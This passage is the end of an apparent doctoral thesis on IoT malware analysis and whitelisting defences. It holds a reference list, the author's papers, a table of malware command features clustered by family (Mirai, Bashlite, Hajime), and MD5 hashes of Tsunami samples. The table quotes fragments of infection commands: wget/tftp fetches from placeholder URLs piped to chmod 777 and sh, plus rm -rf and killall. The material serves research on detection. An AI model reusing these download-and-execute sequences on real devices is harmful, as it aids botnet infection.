Linux executables,” Information Technology Journal, vol. 12, no. 2, pp. 380-384, 2013.
[24]X. Wang, W. Yu, A. Champion, X. Fu, and D. Xuan, “Detecting worms via mining dynamic
program execution,” In Proceedings of 2007 Third International Conference on Security and
Privacy in Communications Networks and the Workshops - SecureComm 2007, pp. 412-
421, 2007.
[25]Ham, Hyo-Sik, et al. “Linear SVM-based android malware detection for reliable IoT
services.” Journal of Applied Mathematics, vol. 2014, 2014.
[26]Azmoodeh, Amin, Ali Dehghantanha, and Kim-Kwang Raymond Choo. "Robust Malware
Detection for Internet Of (Battlefield) Things Devices Using Deep Eigenspace Learning."
IEEE Transactions on Sustainable Computing, 2018.
[27]J. Su, D. V. Vargas, S. Prasad, D. Sgandurra, Y. Feng, and K. Sakurai, “Lightweight
Classification of IoT Malware based on Image Recognition,” In Proceedings of 2018 IEEE
100
42nd Annual Computer Software and Applications Conference (COMPSAC), Tokyo, Japan,
2018.
[28]H., Pareek, S., Romana, and P. R. L. Eswari,(2012). “Application whitelisting: approaches
and challenges.” International Journal of Computer Science, Engineering and Information
Technology (IJCSEIT), 2(5).
[29]S., Obermeier, R., Schierholz, and A., Hristova,(2014, September). “Securing industrial
automation and control systems using application whitelisting.” In Emerging Technology
and Factory Automation (ETFA), 2014 IEEE (pp. 1-4). IEEE.
[30]R., Bhardwaj, M., Daftari, D., John, N., Shinde, and V.Deshpande, (2015). “Whitelisting
and Blacklisting for Private Execution of Processes” in Linux
[31]”Debsums - check the MD5 sums of installed Debian packages.”
http://manpages.ubuntu.com/manpages/zesty/en/man1/debsums.1.html, accessed June 21,
2019,
[32]R., Paleari, L., Martignoni, E., Passerini, D., Davidson, M., Fredrikson, J. T., Giffin, and S.,
Jha, (2010, August). “Automatic Generation of Remediation Procedures for Malware
Infections.” In USENIX Security Symposium, pp. 419-434.
[33]F., Shahzad, S., Bhatti, M., Shahzad, and M., Farooq, (2011, June). “In-execution malware
detection using task structures of linux processes.” In Communications (ICC), 2011 IEEE
International Conference on (pp. 1-6). IEEE.
[34]K., Tamiya, S., Nakayama, Y., Ezawa, Y., Tie, C., Wu, D., Yang, K., Yoshioka, and T.
Matsumoto, (2017). “Experiment on removal and prevention of IoT malware using real
devices.” In Symposium on Cryptography and Information Security 2017, Session 3E1-5,
Naha, Japan, 2017.
[35]M., Koike, N., Ogura, S., Takumi, Y., Hanatani, and H. Haruki, (2017). “Development of
101
WhiteEgret™: A Whitelisting-type Execution Control on Linux.” In Computer Security
Symposium 2017, Session 3D3-4, Yamagata, Japan, 2017.
[36]E., Cozzi, M., Graziano, Y., Fratantonio, and D., Balzarotti. "Understanding linux malware."
In 2018 IEEE Symposium on Security and Privacy (SP), pp. 161-175. IEEE, 2018.
[37]D., Goodin, "BrickerBot, the permanent denial-of-service botnet, is back with a vengeance,"
ARS TECHNICA, https://arstechnica.com/information-technology/2017/04/brickerbot-the-
permanent-denial-of-service-botnet-is-back-with-a-vengeance/, accessed Feb. 06. 2019.
[38]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION
WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-
execution-cve-2017-17020/, accessed Feb. 06. 2019.
[39]M., Jakobsson, and Z., Ramzan, "Crimeware: understanding new attacks and defenses,"
pp17-19, Addison-Wesley Professional, 2008.
[40]A., Luotonen, and k., Altis, "World-wide web proxies," Computer Networks and ISDN
systems, 27(2), pp147-154, 1994.
[41]PF (4), https://www.freebsd.org/cgi/man.cgi?pf, accessed Feb. 06. 2019.
[42]Rieger, G., socat (1) - Linux man page, https://linux.die.net/man/1/socat, accessed Feb. 06.
2019.
[43]P. Eckersley, "How unique is your web browser?" In International Symposium on Privacy
Enhancing Technologies Symposium, pp. 1-18. Springer, Berlin, Heidelberg, July, 2010.
[44]K., Mowery, and H., Shacham, “Pixel perfect: Fingerprinting canvas in HTML5.” In
Proceedings of W2SP, pp1-12, 2012
[45]G., Acar, C., Eubank, S., Englehardt, M., Juarez, A., Narayanan, and C., Diaz, "The web
never forgets: Persistent tracking mechanisms in the wild," In Proceedings of the 2014 ACM
SIGSAC Conference on Computer and Communications Security, pp. 674-689, Nov, 2014.
102
[46]P., Raschke, and A., Küpper, A. "Uncovering Canvas Fingerprinting in Real-Time and
Analyzing ist Usage for Web-Tracking," In Workshops der INFORMATIK 2018-
Architekturen, Prozesse, Sicherheit und Nachhaltigkeit. Köllen Druck+ Verlag GmbH, 2018.
[47]"Valve/fingerprintjs2", https://github.com/Valve/fingerprintjs2, accessed Feb. 06. 2019.
[48]Fidus, "DLINK DCS-5020L DAY N’ NIGHT CAMERA REMOTE CODE EXECUTION
WALKTHROUGH," Fidus, https://fidusinfosec.com/dlink-dcs-5030l-remote-code-
execution-cve-2017-17020/, accessed Feb. 06. 2019.
[49]METASPLOIT, "D-Link DSL-2750B - OS Command Injection (Metasploit),"
https://www.exploit-db.com/exploits/44760, accessed Feb. 06. 2019.
[50]"Kernel and Device Drivers Layer,"
https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Tech
nology_Overview/SystemTechnology/SystemTechnology.html, accessed Feb. 06. 2019.
[51]”mitmproxy”, https://mitmproxy.org/, accessed Feb. 06. 2019.
[52]S., Henning, A. Rao, and R., Lanphier, "Real time streaming protocol (RTSP),"
https://www.ietf.org/rfc/rfc2326.txt, accessed Feb. 06. 2019.
[53]P., Alan, L., Farrell, D., Kemp, and W. Lupton. "Upnp device architecture 1.1." In UPnP
Forum, vol. 22. 2008.
[54]Z., PENG and C., WU, "Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote
Buffer Overflow," Exploit Database, https://www.exploit-db.com/exploits/41738, accessed
Feb. 06. 2019.
[55]METASPLOIT, “D-Link DCS-930L - (Authenticated) Remote Command Execution
(Metasploit),” https://www.exploit-db.com/exploits/39437, accessed Feb. 06. 2019.
[56]Google, "," https://support.google.com/webmasters/answer/182072?hl=en, accessed Feb.
06. 2019.
103
[57]Google, "Verifying Googlebot," https://support.google.com/webmasters/answer/80553,
accessed Feb. 06. 2019
[58]VULNSPY, "ThinkPHP 5.0.23/5.1.31 - Remote Code Execution," https://www.exploit-
db.com/exploits/45978, accessed Feb. 06. 2019.
[59]G., Eberhardt, "AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities,"
https://www.exploit-db.com/exploits/40500, accessed Feb. 06. 2019.
[60]CORE SECURITY, "AirLink101 SkyIPCam1620W - OS Command Injection,"
https://www.exploit-db.com/exploits/37527, accessed Feb. 06. 2019.
[61]Procode701, "Fastweb FASTGate - 0.00.67 RCE Vulnerability,"
https://cxsecurity.com/issue/WLB-2018100117, accessed Feb. 06. 2019.
[62]"CVE-2018-14847," https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847,
accessed Feb. 06. 2019.
[63]HOUSSAMIX, "TUTOS 1.3 - 'cmd.php' Remote Command Execution,"
https://www.exploit-db.com/exploits/4861, accessed Feb. 06. 2019.
[64]V. Total, "Analyze suspicious files and URLs to detect types of malware, automatically
share them with the security community," https://www.virustotal.com/#/home/upload,
accessed Feb. 06. 2019.
[65]B. Krebs, “Source Code for IoT Botnet ‘Mirai’ Released,”
https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-Mirai-released/, accessed
Jan. 18. 2019.
[66]J. Gamblin, “Mirai-Source-Code,” GitHub, https://github.com/jgamblin/Mirai-Source-
Code/, accessed Jan. 18. 2019.
[67]W. H. Gomaa and A. A. Fahmy, “A survey of text similarity approaches," International
Journal of Computer Applications, vol. 68, no. 13, pp. 13-18, 2013.
104
[68]M., Christopher, P., Raghavan, and H., Schütze. "Introduction to information retrieval."
Natural Language Engineering 16.1 (2010), pp. 100-103.
[69]Ukkonen, Esko. "Approximate string-matching with q-grams and maximal matches."
Theoretical computer science 92 no.1 (1992), pp. 191-211
[70]M., Sharma, N., Rajpal, R. B., Reddy, and K. R., Purwar, (2013). Normalised LCS-based
method for indexing multidimensional data cube. International Journal of Intelligent
Information and Database Systems, 7(2), pp. 180-204.
[71]Bakkelund, Daniel. "An LCS-based string metric." Olso, Norway: University of Oslo
(2009).
[72]Heeringa, Wilbert Jan. "Measuring dialect pronunciation differences using Levenshtein
distance." PhD diss., University Library Groningen, pp. 130-132. 2004.
[73]Dreßler, Kevin, and Axel-Cyrille Ngonga Ngomo. "On the efficient execution of bounded
jaro-winkler distances." Semantic Web 8.2 (2017), pp. 185-196.
[74]D. Davidson, “linux.mirai,” https://github.com/0x27/, accessed Jan. 18. 2019.
[75]G. Kondrak, “N-gram similarity and distance,” In International Symposium on String
Processing and Information Retrieval, Springer Berlin Heidelberg, pp.115-126, 2005.
[76]P. F. Brown, P. V. Desouza, R. L. Mercer, V. J. D. Pietra, and J. C. Lai, “Class-based n-gram
models of natural language,” Computational linguistics, vol. 18, no. 4, pp. 467-479, 1992.
[77]I. H. Witten, E. Frank, and M. A. Hall, “Data Mining: Practical machine learning tools and
techniques,” Morgan Kaufmann, 2016.
[78]M. Bailey et al. “Automated classification and analysis of internet malware”. In: Recent
Advances in Intrusion Detection. Ed. by C. Kruegel, L. Lippmann, and Clark Andrew. Vol.
4637. Lecture Notes in ComputerScience, pp. 178–197, 2007
[79]Joachims, Thorsten. "Text categorization with support vector machines: Learning with
105
many relevant features," In European conference on machine learning, pp. 137-142, 1998.
[80]Hotho, Andreas, Andreas Nürnberger, and Gerhard Paaß. "A brief survey of text mining." In
Ldv Forum, vol. 20, no. 1, pp. 19-62, 2005
[81]K. P. Murphy, “Naive bayes classifiers,” University of British Columbia, 2006.
[82]I. Rish, “An empirical study of the naive Bayes classifier,” In IJCAI 2001 workshop on
empirical methods in artificial intelligence, vol. 3, no. 22, pp. 41-46, 2001.
[83]K. Sato, “An inside look at google bigquery. White paper”, Google,
https://cloud.google.com/files/BigQueryTechnicalWP.pdf, accessed Jan. 18. 2019.
[84]F. Pedregosa et al., "Scikit-learn: Machine learning in Python", Journal of Machine
Learning Research, vol. 12, pp. 2825-2830, Oct. 2011.
[85]die.net, “ptmx(4) - Linux man page,” https://linux.die.net/man/4/ptmx., accessed Jan. 18.
2019.
[86]J. Trost, “7up (Mirai?) Triage, More IoT Malware Targeting Weak Passwords,”
http://www.covert.io/7up-mirai-triage-more-iot-malware-targeting-weak-passwords/,
accessed Jan. 18. 2019.
[87]C. Zheng, C. Xiao, and Y. Jia, “IoT Malware Evolves to Harvest Bots by Exploiting a Zero-
day Home Router Vulnerability,” Palo Alto Networks,
https://researchcenter.paloaltonetworks.com/2018/01/unit42-iot-malware-evolves-harvest-
bots-exploiting-zero-day-home-router-vulnerability/, accessed Jan. 18. 2019.
[88]E. Auchard, (2016, November 29). "Deutsche Telekom attack part of global campaign on
routers." https://www.reuters.com/article/us-deutsche-telekom-outages/deutsche-telekom-
attack-part-of-global-campaign-on-routers-idUSKBN13O0X4, accessed Nov. 26. 2017.
[89]L. Franceschi-Bicchierai, (2016, September 29). "How 1.5 Million Connected Cameras
Were Hijacked to Make an Unprecedented Botnet."
106
https://motherboard.vice.com/en_us/article/8q8dab/15-million-connected-cameras-ddos-
botnet-brian-krebs, accessed Nov. 26. 2017.
[90]McAfee, "Embedded Control." http://support.intelsecurity.com/us/products/embedded-
control.aspx, accessed Nov. 20. 2017.
[91]Kaspersky, "Embedded Systems Security 2.0."
https://support.kaspersky.com/kess2#requirements, accessed Nov. 19. 2017.
[92]"Supported embedded operating systems in OfficeScan 10.6."
https://success.trendmicro.com/solution/1060451-supported-embedded-operating-systems-
in-officescan-10-6, accessed Nov. 19. 2017.
[93]Symantec™, "Critical System Protection Version 5.2 RU9 MP6 Platform and Feature
Matrix."
https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUME
NTATION/8000/DOC8022/en_US/SCSP_Platform_Feature_Matrix.pdf?__gda__=1511283
679_42c5dda9b7a1075c7b46cc29d7137977, accessed Nov. 20. 2017.
[94]"User Guide McAfee Embedded Control 6.5.1."
https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATI
ON/25000/PD25615/en_US/mec_651_ug_en_us.pdf, accessed Nov.20. 2017.
[95]Symantec, "Critical System Protection 5.2.9 Installation Guide." https://origin-
symwisedownload.symantec.com/resources/sites/SYMWISE/content/live/DOCUMENTATI
ON/5000/DOC5944/en_US/SCSP_Installation_Guide.pdf, accessed Nov. 20. 2017.
[96]"What is GNU/Linux?" http://www.getgnulinux.org/en/linux/, accessed June 21. 2017.
[97]"Yocto Project." https://www.yoctoproject.org/, accessed Nov. 27. 2017.
[98]Yocto Project, "Linux Kernel Development Manual."
http://www.yoctoproject.org/docs/2.0.2/kernel-dev/kernel-dev.html, accessed Nov. 27. 2017.
107
[99]M., Mitchell, J., Oldham, and A. Samuel,(2001). Advanced linux programming (pp. 147-
156). New Riders.
[100]"Proc - process information pseudo-filesystem." http://man7.org/linux/man-
pages/man5/proc.5.html, accessed June 21. 2017.
[101]E. Brown, (2016, October 27). "Open Source Operating Systems for IoT."
https://www.linux.com/news/open-source-operating-systems-iot, accessed July 30. 2017.
[102]B. Nguyen, (2003). "Linux Filesystem Hierarchy."
[103]"fstab - static information about the filesystems." http://man7.org/linux/man-
pages/man5/fstab.5.html, accessed June 21. 2017.
[104]R. Landley, (2005, October 17). "Ramfs, rootfs and initramfs."
https://www.kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt, accessed
July 10. 2017.
[105]P., Lougher, and R., Lougher, (2008). "SquashFS."
[106]G., KH. (2009, August 5). "Driver Core: devtmpfs - kernel-maintained tmpfs-based /dev."
https://lwn.net/Articles/345480/, accessed July 10. 2017.
[107]P. Snyder, (1990, October). "tmpfs: A virtual memory filesystem." In Proceedings of the
autumn 1990 EUUG Conference, pp. 241-248.
[108]P., Mochel, (2005, July). "The sysfs filesystem." In Linux Symposium, p. 313.
[109]N. Brown, (2016, June 1). "Containers, pseudo TTYs, and backward compatibility."
https://lwn.net/Articles/688809/, accessed July 10. 2017.
[110]D. Woodhouse, (2001, July). "JFFS: The journalling flash filesystem." In Ottawa linux
symposium Vol. 2001.
[111]B., Hards, "The Linux USB sub-system." Sigma Bravo Pty Ltd, http://www. linux-
usb.org/USB-guide/book1.html, accessed June 21. 2017.
108
[112]"Vulnerability Details: CVE-2017-7253." http://www.cvedetails.com/cve/CVE-2017-
7253/, accessed July 30. 2017.
[113]C., Cimpanu, (2017, May 11). "40 Asus RT Router Models Are Vulnerable to Simple
Hacks." https://www.bleepingcomputer.com/news/security/40-asus-rt-router-models-are-
vulnerable-to-simple-hacks/, accessed July 30. 2017.
[114]T., Sudo (2016). 無線LAN機器、出荷停止 サイバー攻撃に悪用の恐れ [Shipment
of Wireless LAN equipment is suspended due to fear of abuse in cyber attacks],
http://www.asahi.com/articles/ASJDN5GJ5JDNUUPI00C.html, accessed July 30. 2017.
[115]"VirusTotal Public API v2.0." https://www.virustotal.com/en/documentation/public-api/,
accessed June 23. 2017
[116]F., Lardinois, (Sep. 7, 2012) "Google Acquires Online Virus, Malware and URL Scanner
VirusTotal. TechCrunch." https://techcrunch.com/2012/09/07/google-acquires-online-virus-
malware-and-url-scanner-virustotal/, accessed June 22. 2017.
[117]"IBM Watson IoT". https://github.com/ibm-watson-iot, accessed June 23. 2017.
[118]S., Nanz, and C. A., Furia, (2015, May). "A comparative study of programming languages
in Rosetta Code." In Software Engineering (ICSE), 2015 IEEE/ACM 37th IEEE
International Conference on Vol. 1, pp. 778-788. IEEE.
[119]J., Morris, S., Smalley, and G., Kroah-Hartman. (2002, August). "Linux security
modules: General security support for the linux kernel." In USENIX Security Symposium.
109
List of Paper
Reviewed papers in Journals
J-1) Chun-Jung Wu, Ying Tie, Satoshi Hara, Kazuki Tamiya, Akira Fujita, Katsunari
Yoshioka, and Tsutomu Matsumoto. "IoTProtect: Highly Deployable Whitelist-based
Protection for Low-cost Internet-of-Things Devices." Journal of Information Processing
Vol. 26, pp 662-672, Sept. 2018.
J-2) Chun-Jung Wu, Shin-Ying Huang, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT
Malware Analysis and New Pattern Discovery Through Sequence Analysis Using Meta-
Feature Information." The IEICE Transactions on Communications. Vol.E103-B,No.1,
Jan. 2020.
Preparing to submit papers in Journals
J-3) Chun-Jung Wu, Katsunari Yoshioka, and Tsutomu Matsumoto. “ThingGate: A gateway
for managing traffic of bare-metal IoT honeypot.” Journal of Information Processing.
Technical Reports
T-1) Chun-Jung Wu, Ying Tie, Katsunari Yoshioka, and Tsutomu Matsumoto. "IoT malware
behavior analysis and classification using text mining algorithm." (2016). In Computer
Security Symposium (CSS), Akita, Japan, Oct. 2016.
T-2) Kazuki Tamiya, Sou Nakayama, Yuta Ezawa, Ying Tie, Chun-Jung Wu, Di Yang,
Katsunari Yoshioka, and Tsutomu Matsumoto. (2017). “Experiment on removal and
prevention of IoT malware using real devices.” In Symposium on Cryptography and
Information Security 2017, Session 3E1-5, Naha, Japan, 2017.
110
Appendix Appendix A The text features and family of clusters
THE TEXT FEATURES AND FAMILY OF CLUSTERS.
Feature
Id
ECT index/
cluster size (*)
Cluster id Text features Family Numbers of
ECTs
1 (4) 25 rm -rf ; pkill -9 ;killall -9 ;, shell, cd /tmp || cd /var/system || cd /mnt || cd
/lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*
Bashlite 4
2 4224 26 cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /,
wget/tftp/get/ftpget, chmod, sh, rm
Bashlite 1
3 (10) 21 cd /tmp || cd /var || cd /dev/shm || cd /var/tmp || cd /root || cd /,
wget/tftp/get/ftpget, chmod, sh, rm
Bashlite (&
Tsunami)
10
4 3452 22 >/dev/netslink/.t && cd /dev/netslink/ Bashlite 1
5 397 23 cd /tmp; rm -fr *; wget/curl/tftp/get/ftpget, chmod, sh, rm Bashlite 1
6 (37) 20 '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx &&
cd /dev/', '>/mnt/.ptmx && cd /mnt/',
Mirai
variant
37
7 (9) 19 '>/tmp/.ptmx && cd /tmp/', '>/var/.ptmx && cd /var/', '>/dev/.ptmx &&
cd /dev/', '>/mnt/.ptmx && cd /mnt/',
Bashlite
variant
9
8 3665 24 >/dev/.t && cd /dev/;>pppd, >/var/tmp/.t && cd /var/tmp/;>pppd, Bashlite
variant
1
9 (69) 17 /bin/busybox ECCHI, /bin/busybox ps; Mirai 69
10 (3374) 16 /bin/busybox ECCHI, /bin/busybox ps; Mirai 3374
11 823 18 /bin/busybox ECCHI, /bin/busybox ps; Mirai 1
12 (4) 15 wget [url]l -O - > dvrHelper; chmod 777 ; /bin/busybox ECCHI Mirai 4
13 (151) 13 (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), Hajime 151
14 2236 14 (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), Hajime 1
15 (2) 12 (dd bs=52 count=1 if=.s || cat .s), (dd bs=52 count=1 if=.s || cat .s), Hajime 2
16 4080 11 cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var Bashlite 1
17 3017 10 cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var Bashlite 1
18 (4) 9 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /, wget/tftp/get/ftpget,
chmod, sh, rm
Bashlite 4
111
19 916 27 busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf, cd /var || cd
/tmp || cd /var/run || cd /var/tmp || cd /dev || cd /dev/shm || cd /mnt || cd
/boot || cd /usr || cd /dev/netslink
Bashlite 1
20 (3) 8 sh || bash || shell, cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var Bashlite 3
21 (2) 6 cd /tmp; wget || curl -O ; chmod 777 ; sh Bashlite 2
22 3703 7 cd /tmp; wget || curl -O ; chmod 777 ; sh Bashlite 1
23 (3) 3 sh, shell, help, busybox, wget Mirai 3
24 2520 4 sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh || bash ; rm -rf ; Mirai 1
25 2896 5 sh, shell, help, busybox, wget/ tftp ; chmod 777 ; sh || bash ; rm -rf ; Mirai 1
26 (5) 2 chmod a+x 7up;./7up., system., /bin/busybox Mirai. Mirai
variant
5
27 726 28 cd /tmp, wget/tftp/get/ftpget, chmod, sh, rm Bashlite 1
28 3921 29 busybox wget || wget [url] || tftp [url]; sh Bashlite 1
29 (934) 1 killall wget; killall ping; killall sh while true; do wget -O /dev/null [url]
> /dev/null 2>
Unknow 934
30 325 30 /bin/busybox MIRAI., cd /var/tmp ;cd /tmp; rm -f *; ftpget, sh & Mirai 1
Appendix B THE MD5 OF MALWARE TSUNAMI (APRIL 2017, FEATURE ID 3 OF APPENDIX
A).
THE MD5 OF MALWARE TSUNAMI (APRIL 2017, FEATURE ID 3 OF APPENDIX A).
MD5
10f045aa890077adc300ea79686eefba
1920b61e9c1e001e2c651bc9ffd59b1a
196dfd58285222b20d6d3434645114e2
25060f2d2d53e80bf01e77ccbabab077
305f120d4893c293faeb368c31ab0913
4312ad5c366a7e500d23883617db8ead
4e9f282659dcc1cd3e9aa9df69d1f9ae
55e1a814fc007a7ac145d8a1f112da9e
112
571c52660cb9f6f0f3f17f25e871251f
6fae1bce8953e9e16b0fd12361690d23
6ff6033745023abb23277df7de2ae69b
71b3589cd99aa176abd68f647d69bbe7
cd3e728914ba6917911423893d95a75a
cea45d9ad8b5339dbc34bb9d072785f0
d78438bcc89b4ecb62bc089ee4691cb0
d8d5807d12eb2acbdff7eb893b87364f
db2e7c2234302e9db0c47b0891104074
dd900a26248a1d01a3b0cf1c65e8bc44
dd90f88f4028e710da9649d370fda93b
de2569ffa1765d9203397b6b7728358b
f1599964e69bc3d0639a47b38badcdf6
f2f49696f944e793daf73e4de9c67c54
f6c3613139f0f36fa93e88c0ecc13a25